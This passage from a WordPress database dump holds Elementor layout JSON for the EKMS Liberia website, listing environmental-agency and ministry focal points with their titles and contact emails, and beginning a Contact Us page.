Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"John K. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Kawusu Toure\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Assistant Manager - Compliance and Enforcement, ESIA, EPA\\nkawumtoure@gmail.com\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><\\/p><p>Assistant Director, MOCI<\\/p><p>Division of Foreign Trade<\\/p><p><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p><p>\\u00a0<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<br \\/><\\/strong><\\/p><p>Biosafety Officer, MOCI<\\/p><p>National Standard Laboratory<\\/p><p><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><\\/p><p>Coordinator for Standards, MOCI<\\/p><p>Bureau of Industrial Services<\\/p><p><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><\\/p><p>Senior Research Officer, MOCI<\\/p><p>Division of Knowledge Management &amp; Archive<\\/p><p><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58adbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(21804,3157,'_elementor_edit_mode','builder'),(21805,3157,'_elementor_template_type','wp-page'),(21806,3157,'_elementor_version','2.8.1'),(21807,3157,'_wp_page_template','default'),(21808,3157,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"slideshow\",\"background_color\":\"rgba(255,255,255,0.75)\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_slideshow_gallery\":[{\"id\":2315,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\"}],\"background_slideshow_loop\":\"\"},\"elements\":[],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form 